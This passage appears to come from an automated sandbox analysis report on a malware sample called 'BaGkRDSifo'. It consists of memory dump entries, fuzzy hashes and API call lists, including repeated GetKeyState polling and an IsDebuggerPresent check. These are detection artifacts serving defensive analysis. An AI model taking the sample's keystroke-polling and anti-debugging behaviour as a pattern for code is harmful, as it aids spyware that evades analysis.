              • Opcode ID: acf4eb17fa2e2fe0eba56d01c2c52ada3766547a94f0bcc93773e3253e3d6ec5
              • Instruction ID: 34fbd6a95a11c869d2513b604b1fb20e6d7e59236495bf5b7a4c4cf659fa15af
              • Opcode Fuzzy Hash: acf4eb17fa2e2fe0eba56d01c2c52ada3766547a94f0bcc93773e3253e3d6ec5
              • Instruction Fuzzy Hash: CD21F271904244DFEB24DF14D9C4B27BBA5FB84318F24C56AE90A0B342C736E847CEA2
              Memory Dump Source
              • Source File: 00000000.00000002.2480709451.000000000244D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0244D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_244d000_BaGkRDSifo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 023a1c68e9886bf0fe3489899b6dcabc88d3000805d3808e2da054922b70309f
              • Instruction ID: d4d5ec178b46e0c334b90664187fe9c24c8de6868aecae55aa52bc02b530740c
              • Opcode Fuzzy Hash: 023a1c68e9886bf0fe3489899b6dcabc88d3000805d3808e2da054922b70309f
              • Instruction Fuzzy Hash: 8621F571A04244EFFB15DF10D9C4B16BBA5FB88314F24C5AEEC4A4B346CB36D886CA61
              Memory Dump Source
              • Source File: 00000000.00000002.2480709451.000000000244D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0244D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_244d000_BaGkRDSifo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ae2d803e281bb462521b82dabf91e0af286c007d727bca0dc1fd52c78c89b4c0
              • Instruction ID: ebb77108be0a6655642c59da4973d1e145db10389c112824db31a771cdef7439
              • Opcode Fuzzy Hash: ae2d803e281bb462521b82dabf91e0af286c007d727bca0dc1fd52c78c89b4c0
              • Instruction Fuzzy Hash: 7721D775904204DFEB14DF10D5C4B16BBA5FB84318F24C56EE8494F356CB76D446CA61
              Memory Dump Source
              • Source File: 00000000.00000002.2480709451.000000000244D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0244D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_244d000_BaGkRDSifo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: facf2931f333883f56e5188ab091c56cfb2a5c8945a825c2afd7cb818b2995c8
              • Instruction ID: 4d565257762993c619e8cae1d05ee50784722e004c57e0c1d2413cfdb8240448
              • Opcode Fuzzy Hash: facf2931f333883f56e5188ab091c56cfb2a5c8945a825c2afd7cb818b2995c8
              • Instruction Fuzzy Hash: 19218E755093C0CFDB16CF20D994B16BF71EB86218F2885DBD8458B657C33AD81ACBA2
              Memory Dump Source
              • Source File: 00000000.00000002.2480470502.000000000243D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0243D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_243d000_BaGkRDSifo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: adbf5105ac1f7104a55b3a839fbc7cfe710a0586d9cd965a1551491156f1530b
              • Instruction ID: d775f198d1d2f10f08a336cd7feec3575988fe2d59852b84fca6a98a41f2da39
              • Opcode Fuzzy Hash: adbf5105ac1f7104a55b3a839fbc7cfe710a0586d9cd965a1551491156f1530b
              • Instruction Fuzzy Hash: AD118176904280DFCB16CF10D6C4B1ABF71FB88714F24C5AAD9094B756C336D456CBA1
              Memory Dump Source
              • Source File: 00000000.00000002.2480470502.000000000243D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0243D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_243d000_BaGkRDSifo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: adbf5105ac1f7104a55b3a839fbc7cfe710a0586d9cd965a1551491156f1530b
              • Instruction ID: 206d48e173d37dea12e1aca40ced9cabad00529e2c1b5115b83b0b0e4f7e9148
              • Opcode Fuzzy Hash: adbf5105ac1f7104a55b3a839fbc7cfe710a0586d9cd965a1551491156f1530b
              • Instruction Fuzzy Hash: BC11D376904280CFCB16CF14D5C4B16BF71FB88318F24C5AAD8090B756C336D456CBA1
              Memory Dump Source
              • Source File: 00000000.00000002.2480709451.000000000244D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0244D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_244d000_BaGkRDSifo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 77cf2a7e9c6ff2f06599da0d249c5517d9976d4f6980265ae07191becff276fa
              • Instruction ID: 54538a5109df5c6d8a0260f03a9563d931100a549bc936c783bab8d3fa5cda83
              • Opcode Fuzzy Hash: 77cf2a7e9c6ff2f06599da0d249c5517d9976d4f6980265ae07191becff276fa
              • Instruction Fuzzy Hash: 3C119D75904680DFDB15CF20D5C4B16BFA2FB84318F28C6AAD8494B756C37AD44ACFA1
              Memory Dump Source
              • Source File: 00000000.00000002.2480709451.000000000244D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0244D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_244d000_BaGkRDSifo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 77cf2a7e9c6ff2f06599da0d249c5517d9976d4f6980265ae07191becff276fa
              • Instruction ID: 0afbd511c5a455e9a8d73511a852f20d55a13279ed2f9742b9812f13bb69375a
              • Opcode Fuzzy Hash: 77cf2a7e9c6ff2f06599da0d249c5517d9976d4f6980265ae07191becff276fa
              • Instruction Fuzzy Hash: 54119075904244DFEB16CF10D9C4B16BBA1FB88314F28C6AADC494B756C33AD45ACB51
              Memory Dump Source
              • Source File: 00000000.00000002.2480470502.000000000243D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0243D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_243d000_BaGkRDSifo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d0bf07a87b47e9c2528d2962206d744d5d253107d13ffab0f3c6c0bd4e4e025d
              • Instruction ID: 302748eb3bda2ea846f1d6083a4cfd411f65372c1a139ad309341f886b07d4bf
              • Opcode Fuzzy Hash: d0bf07a87b47e9c2528d2962206d744d5d253107d13ffab0f3c6c0bd4e4e025d
              • Instruction Fuzzy Hash: B601526140D3C09FD7134B258994752BFB4DF47628F1981DBD8988F2A3C2795849CB72
              Memory Dump Source
              • Source File: 00000000.00000002.2480470502.000000000243D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0243D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_243d000_BaGkRDSifo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3a35b1783ecde54bdda96db3193de5891000eb773b03a795d89cfc42d74ab3be
              • Instruction ID: 2dd2a782c15e04da2efdc49ffae5bee46e8400d24c19f4c781b9eefb6d7fb78b
              • Opcode Fuzzy Hash: 3a35b1783ecde54bdda96db3193de5891000eb773b03a795d89cfc42d74ab3be
              • Instruction Fuzzy Hash: E101A771804340EBE7214A25CD84767BBE8DF45A28F18852BED595F282C3799942CEB5
              APIs
              • GetKeyState.USER32(00000001), ref: 0B33E675
              • GetKeyState.USER32(00000002), ref: 0B33E6BA
              • GetKeyState.USER32(00000004), ref: 0B33E6FF
              • GetKeyState.USER32(00000005), ref: 0B33E744
              • GetKeyState.USER32(00000006), ref: 0B33E789
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2493178488.000000000B330000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B330000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b330000_BaGkRDSifo.jbxd
              Similarity
              • API ID: State
              • String ID: fXV
              • API String ID: 1649606143-3172339192
              • Opcode ID: f6565917306995a8af0ad482f7bd9a5d6c8ca69361e3232d2e7a2fb7ebec5c94
              • Instruction ID: 791613ccd6522d22e92b22148412d2a0a142b281d17c261552a608539d74da24
              • Opcode Fuzzy Hash: f6565917306995a8af0ad482f7bd9a5d6c8ca69361e3232d2e7a2fb7ebec5c94
              • Instruction Fuzzy Hash: 3F419C75C007958FEF21DF69C5483AFBFF0AF05708F20845AE499B6280C3795585CBA6
              APIs
              • GetKeyState.USER32(00000001), ref: 0B33E675
              • GetKeyState.USER32(00000002), ref: 0B33E6BA
              • GetKeyState.USER32(00000004), ref: 0B33E6FF
              • GetKeyState.USER32(00000005), ref: 0B33E744
              • GetKeyState.USER32(00000006), ref: 0B33E789
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2493178488.000000000B330000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B330000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b330000_BaGkRDSifo.jbxd
              Similarity
              • API ID: State
              • String ID: fXV
              • API String ID: 1649606143-3172339192
              • Opcode ID: 3a76cbe566e124e21981af8b7afe56244be1e44840608af0995015f07ae22e39
              • Instruction ID: 12586c27fccf3811e2618a3344dcac92b490f85dc42488e792263a04cb6f93a5
              • Opcode Fuzzy Hash: 3a76cbe566e124e21981af8b7afe56244be1e44840608af0995015f07ae22e39
              • Instruction Fuzzy Hash: BC417E75C007958EEF21DF9AC5487AFBBF4AB04708F20845AE459B6280C3789585CBA5
              APIs
              • IsDebuggerPresent.KERNEL32 ref: 004136F4
              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
              • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
              • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
              • TerminateProcess.KERNEL32(00000000), ref: 00413737
              Memory Dump Source
              • Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd
              Similarity
              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
              • String ID:
              • API String ID: 2579439406-0
              • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
              • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
              • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
              • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2491275603.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_BaGkRDSifo.jbxd
              Similarity
              • API ID:
              • String ID: Hq$Hq$Hq$Hq$Hq
              • API String ID: 0-3799487529
              • Opcode ID: 4341ad81eb6c79b2ff7b43158cca51606ae2f91eefe05ae0cd8599a248d66f3c
              • Instruction ID: 877f1d874adfb5b32630994adc368cb514e585c63c44a0f3b6dc4aa70101153a
              • Opcode Fuzzy Hash: 4341ad81eb6c79b2ff7b43158cca51606ae2f91eefe05ae0cd8599a248d66f3c
              • Instruction Fuzzy Hash: 0F326330E002189FEB54EFA5D95079EBBF2AF89300F14856AD40AAB355DF349D85CF91
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd
              Similarity
              • API ID:
              • String ID: @$@$PA
              • API String ID: 0-3039612711
              • Opcode ID: 524773d1bc2011db47f0014430bcd25baf081f96639b8f8b2c6f9a821cea509b
              • Instruction ID: 284407f43597d2b1529aa5dbb826e4f49811f0ea4eaa41d9cabafce47d44ff82
              • Opcode Fuzzy Hash: 524773d1bc2011db47f0014430bcd25baf081f96639b8f8b2c6f9a821cea509b
              • Instruction Fuzzy Hash: 64E159316083418FC724DF28C58066BB7E1AFD9314F14493EE8C5A7391EB79D949CB8A
              APIs
              • GetProcessHeap.KERNEL32 ref: 0040ADD0
              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
              Memory Dump Source
              • Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd
              Similarity
              • API ID: Heap$FreeProcess
              • String ID:
              • API String ID: 3859560861-0
              • Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
              • Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
              • Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
              • Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
              APIs
              • SetUnhandledExceptionFilter.KERNEL32(Function_000123AF), ref: 004123F6
              Memory Dump Source
              • Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd
              Similarity
              • API ID: ExceptionFilterUnhandled
              • String ID:
              • API String ID: 3192549508-0
              • Opcode ID: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
              • Instruction ID: 17be93bd3878235df00445469c4c747c8dbd7a907b9f456768254b9c32cbcc1b
              • Opcode Fuzzy Hash: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
              • Instruction Fuzzy Hash: CA900270661144D7865017705D0968669949B4C6427618471653DD4098DBAA40505569
              Memory Dump Source
              • Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8976f0a61fc1960936828f21bd26f3318fd330ab7a4f50ce487ee3b945538f04
              • Instruction ID: d5e3495c9826dce769b252ea72d1bcaf7b5d46a24141b332915225fd3cdae7ad
              • Opcode Fuzzy Hash: 8976f0a61fc1960936828f21bd26f3318fd330ab7a4f50ce487ee3b945538f04
              • Instruction Fuzzy Hash: 9852A471A047129FC708CF29C99066AB7E1FF88304F044A3EE896E7B81D739E955CB95
              Memory Dump Source
              • Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 20055dc05f39624d89f9d13173d00032c9ddb5f23ed3028259e70998ae7a08b4
              • Instruction ID: 17d22deff8d32e931318445bbea846c6b698fa6fcc44f6923348d96d7e24b863
              • Opcode Fuzzy Hash: 20055dc05f39624d89f9d13173d00032c9ddb5f23ed3028259e70998ae7a08b4
              • Instruction Fuzzy Hash: 0A329E70A087029FD318CF29C98472AB7E1BF84304F148A3EE89567781D779E955CBDA
              Memory Dump Source
              • Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 020392db844ceed98276714fd2150c2ad4a639f6bad3fb02a1d0621011a6745a
              • Instruction ID: cc67e10771130af0a5279b37c8f7fa75a2653c997645fd1ae8a0b8309c7f2627
              • Opcode Fuzzy Hash: 020392db844ceed98276714fd2150c2ad4a639f6bad3fb02a1d0621011a6745a
              • Instruction Fuzzy Hash: 48E1D6306083514FC708CF28C99456ABBE2EFC5304F198A7EE8D68B386D779D94ACB55
              Memory Dump Source
              • Source File: 00000000.00000002.2490318078.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5a30000_BaGkRDSifo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9d66a6cafa313fbef3afa8cb9a142d99333985334ef482aa5b5b1998c3f1cda9
              • Instruction ID: 920d6fae24899086111875a7a3a9efab6408fb357e9939ed8617c2c414b72680
              • Opcode Fuzzy Hash: 9d66a6cafa313fbef3afa8cb9a142d99333985334ef482aa5b5b1998c3f1cda9
              • Instruction Fuzzy Hash: BC12A7F0C817458AD712CF29E94C1893BB1B741318BD64A19D2612F2E5E7B8167EEF8C
              Memory Dump Source
              • Source File: 00000000.00000002.2491275603.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_BaGkRDSifo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7cfadc2e63f950ddbbdd61343fd84aa5b9d20127e86591c9abd045ba4612acb2
              • Instruction ID: 5e90a01006dbb52217d6144dde895f493553ca3c9ad12cd2446f28864d4edb08
              • Opcode Fuzzy Hash: 7cfadc2e63f950ddbbdd61343fd84aa5b9d20127e86591c9abd045ba4612acb2
              • Instruction Fuzzy Hash: 22D18E31E002189FDF95EF68C98079DBBB2BF89300F15C1AAD45AAB255DB34D985CF90
              Memory Dump Source
              • Source File: 00000000.00000002.2492937058.000000000A300000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A300000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a300000_BaGkRDSifo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 84f4f04360465f1bc7d1fb1c26709661a46a59a03b2af81479cf38c858478aa0
              • Instruction ID: 0c1519043e47f289d854b764f14c4c58084b9fab0ab4bec3b9d4d0ec0d3eda09
              • Opcode Fuzzy Hash: 84f4f04360465f1bc7d1fb1c26709661a46a59a03b2af81479cf38c858478aa0
              • Instruction Fuzzy Hash: C8D1E435C2075A9ACB11EFA5D890699F7B1FF95300F10CB9AE5093B250EB70AAC5CF91
              Memory Dump Source
              • Source File: 00000000.00000002.2490481036.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5aa0000_BaGkRDSifo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 422c59839749a19cc5e82c0cb8d2cfb9cbbed80cb1a04bff55d328e2f6caf452
              • Instruction ID: c9f5e9edde12ec401bb9a5120eee33da9e0f02102c57e885633ea5904f11f349
              • Opcode Fuzzy Hash: 422c59839749a19cc5e82c0cb8d2cfb9cbbed80cb1a04bff55d328e2f6caf452
              • Instruction Fuzzy Hash: EBA16032F00209CFCF19DFB5C9449AEB7B2FF88300B15856AE916AB265DB31D955CB80
              Memory Dump Source
              • Source File: 00000000.00000002.2492937058.000000000A300000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A300000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a300000_BaGkRDSifo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b724f26841593bdf23a6b1419e7af6f5e3ac220c8c823b346f4fbb569cce136d
              • Instruction ID: 3c6a579211f4da01058af73a632cc2566af08e1be4e083195062f4a7fc7b8f74
              • Opcode Fuzzy Hash: b724f26841593bdf23a6b1419e7af6f5e3ac220c8c823b346f4fbb569cce136d
              • Instruction Fuzzy Hash: 18D1E435C2075A9ACB11EFA4D890699F7B1FF95300F10CB9AE5093B210EB70AAC5CF91
              Memory Dump Source
              • Source File: 00000000.00000002.2490318078.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5a30000_BaGkRDSifo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9807fed60eec27115b56764dd670586f0f22467a8cbcb539b469b3d4badd33ab
              • Instruction ID: 009077d6789ab130fbe93f587b996e8eb8d0aaf7978d106dcf0a9a2726bbda5c
              • Opcode Fuzzy Hash: 9807fed60eec27115b56764dd670586f0f22467a8cbcb539b469b3d4badd33ab
              • Instruction Fuzzy Hash: 37D13FB0C817458BD712CF29E8482893BB1FB45314F964A19D1616F2D1FBB8167EEF88
              Memory Dump Source
              • Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 519d71d31dfe2b71d65c539f7253ce4d0ce1a0c509a5eaaf561cac07154b4855
              • Instruction ID: 74c1b90a01db230de662c72faab58802bb742d928f34651097fec506a9751401
              • Opcode Fuzzy Hash: 519d71d31dfe2b71d65c539f7253ce4d0ce1a0c509a5eaaf561cac07154b4855
              • Instruction Fuzzy Hash: 15717072A9155347E39CCF5CECD17763713DBC5351F49C23ACA025B6EAC938A922C688
              Memory Dump Source
              • Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 56d4400f77c04dc4446d24fbb084ed78fa0beaad766ef6ff58d44a670f1be69a
              • Instruction ID: e93c334361593eb17f37b37ed9e80cdb2c00b1b1e1af3e0e9a736190e966ddef
              • Opcode Fuzzy Hash: 56d4400f77c04dc4446d24fbb084ed78fa0beaad766ef6ff58d44a670f1be69a
              • Instruction Fuzzy Hash: 4A615E3266055747E391DF6DEEC47663762EBC9351F18C630CA008B6A6CB39B92297CC
              Memory Dump Source
              • Source File: 00000000.00000002.2481362069.00000000024E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_24e0000_BaGkRDSifo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 19e62c815db37fe26a07bda9e7a3f7111ca67b738b49d905baace6c28e6b5274
              • Instruction ID: fa267e30e0052bdd03920d65445b35db73880c5327fe4e8032f931b90fb38ea9
              • Opcode Fuzzy Hash: 19e62c815db37fe26a07bda9e7a3f7111ca67b738b49d905baace6c28e6b5274
              • Instruction Fuzzy Hash: CF517A30E003449FEB45EF37E95069A7BE3BBC8304F48C56DC0059B265DB78584A9BA5
              Memory Dump Source
              • Source File: 00000000.00000002.2481362069.00000000024E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_24e0000_BaGkRDSifo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b7369097bd5bff9db9bda5080482a3c9750c48dc30b7c7c3f3132240253c7fed
              • Instruction ID: 6e94012dbeb02cd45057b609d091c2b329482be4c103aacf40f0c722ea0759e5
              • Opcode Fuzzy Hash: b7369097bd5bff9db9bda5080482a3c9750c48dc30b7c7c3f3132240253c7fed
              • Instruction Fuzzy Hash: 85517B30E003449FEB45EF37E94069A7BE3BBC8304F58C92DC0059B264DB78584AABA5
              Memory Dump Source
